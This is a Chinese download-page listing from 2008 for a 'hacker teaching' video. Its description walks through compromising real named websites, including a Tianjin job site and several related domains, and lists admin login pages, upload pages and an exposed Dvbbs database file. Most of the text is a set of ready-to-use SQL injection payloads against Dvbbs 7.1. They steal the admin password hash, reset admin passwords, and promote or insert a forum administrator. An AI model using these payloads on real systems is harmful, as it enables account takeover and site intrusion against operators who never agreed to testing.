下载月排行
立即下载TS安全检测得webshell全过程
软件大小: | 27.9 MB |
---|---|
软件语言: | 简体中文 |
软件类别: | 黑客教学 - 黑客动画 |
授权方式: | 共享版 |
应用平台: | Win9X/2000/XP/2003/ |
更新时间: | 2008/8/19 17:08:02 |
开 发 商: | 暂无信息 |
联 系 人: | 暂无联系方式 |
分享收藏 | |
解压密码: | 本站默认解压密码:www.987654321sf.com |
推荐等级: | |
会员中心: | 【账号登录】 【账号注册】 开通VIP下载流程 |
查毒情况: |
[复制下载页面地址给QQ/MSN上的好友]软件介绍
安全检测天津滨海人才网
HaoSec.TS
大家好,我是HaoSec.TS,这个是我进行安全检测的思路,希望可以对大家有所帮助,当大家看到动画的时候,漏洞应该已经修补上了。
我的个人站
好安全网:www.haosec.com
安全论坛:www.haosec.com/bbs
群1(满)
群2(满)
群3(满)
群4:25569094
论坛也是给大家交流的地方,我会在上面解答所有朋友们提出的问题,经常会有大家上SKYPE
语音进行问题的讨论,也希望有更多喜爱网络安全的朋友加入到我们这里来!!!
===========================================================================
检测开始
==============================================================================
站点:http://www.bhrc.com.cn
http://www.tjlyce.com\qx 千寻网站管理系统!
http://www.tjlyce.com/eshop/admin/admin_login.asp 56770.com网店
http://www.tjlyce.com/ershou/upfile.asp 无法上传
http://www.winfore.net/editor/Admin_Default.asp 无法修改
http://www.shangyong.net/bbs/Data\Dvbbs7.mdb Dvbbs7.1
Powered By Dvbbs Version 7.1.0 Sp1
(1):手工入侵:我们可以以注册用户找个版面发帖子,在贴子内容下有个选择帖子类型.选择论坛交易币设置",在金币数量,购买数量聘用制,VIP用户浏览选项里我们都不作任何变动,在可购买用户名单限制输入栏中,我们提交以下的SQL语句:
(假如我们注册的用户为"haosec.ts")
A:coolidea|||123',0);update(更新)/**/(代替空格)Dv_User/**/set/**/UserEmail=(select[password]from/**/Dv_admin/**/where[Username]='admin')/**/where[UserName]='haosec.ts';--
把管理员的MD5加密密码更新到用户haosec.ts的邮箱去
B:coolidea|||123',0);update/**/Dv_User/**/set/**/Userpassword='160b8f6e39dde298'/**/where[UserName]='admin';--
将管理员的前台密码改为82821188
C:coolidea|||123',0);update/**/Dv_Admin/**/set/**/password='160b8f6e39dde298'/**/where[UserName]='shellpo';--
将管理员的后台密码改为82821188(160b8f6e39dde298)解密后就是82821188
(以上论坛的管理员默认为"admin")
以上是通过修改管理员的前后的密码来登录同样我们还可以通过提交构造以下SQL语句来把注册的用户直接提升这前后台管理员,
D: $PayMoney|||',3);update [Dv_user] set usergroupid=1 where username='admin';--
把用户admin提升为前台管理员
E:coolidea|||123',0);Insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('160b8f6e39dde298','admin','admin','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36');--
在后台添加一个用户名为"admin"的管理员,
http://www.shangyong.net/bbs/UploadFile/2007-10/200710268134322845.txt
HaoSec.ts
WWW.HAOSEC.COM/BBS